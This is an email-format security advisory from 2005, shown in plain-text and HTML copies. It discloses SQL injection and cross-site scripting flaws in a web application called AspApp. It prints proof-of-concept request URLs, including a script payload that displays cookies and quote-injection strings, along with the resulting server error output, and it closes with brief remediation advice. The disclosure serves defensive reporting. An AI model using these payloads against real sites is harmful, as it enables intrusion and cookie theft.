This is a multi-part message in MIME format. ------=_NextPart_000_0055_01C53454.CDDA4C20 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: Multiple sql injection, and xss vulnerabilities in AspApp. Date: March 30, 2005 Vendor: AspApp Vendor site: http://www.localhost Summary: There are multiple sql injection, xss vulnerabilities in the AspApp. Proof of Concept Exploits: http://localhost/content.asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3E= alert(document.cookie)%3C/script%3E Pops cookie http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3DCompany Sql error Microsoft VBScript runtime error '800a000d' Type mismatch: 'cLng' C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341 http://localhost/content.asp?ContentId=3D'SQL_ERROR Sql error Microsoft VBScript runtime error '800a000d' Type mismatch: 'cLng' C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341 http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume= nt.cookie)%3C/script%3E Pops cookie Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm /jk6eYh8KsXpcrRKoGioBL3w =3D2em+ -----END PGP SIGNATURE----- ------=_NextPart_000_0055_01C53454.CDDA4C20 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= /FONT>

Severity: Medium
Title: = Multiple sql=20 injection, and xss vulnerabilities in AspApp.
Date: March = 30, =20 2005
Vendor: AspApp
Vendor site: http://www.localhost

Summary:
There are multiple sql = injection, xss=20 vulnerabilities in the AspApp.

Proof of Concept Exploits:

http://localhost/content= .asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3Ealert(document.cooki= e)%3C/script%3E
Pops=20 cookie

http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3D= Company
Sql=20 error

Microsoft VBScript runtime error=20 '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, = line
341

http://local= host/content.asp?ContentId=3D'SQL_ERROR
Sql=20 error
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp,=20 line
341

http://localhost/content.asp?contenttype= =3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie

Possible fix: The usage of = htmlspeacialchars(), mysql_escape_string(),=20 mysql_real_escape_string() and other functions for input validation = before=20 passing user input to the mysql database, or before echoing data on = the=20 screen, would solve these problems.

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel = free=20 to contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com = or http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com

iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm
= /jk6eYh8KsXpcrRKoGioBL3w
=3D2em+
-----END=20 PGP SIGNATURE-----

------=_NextPart_000_0055_01C53454.CDDA4C20--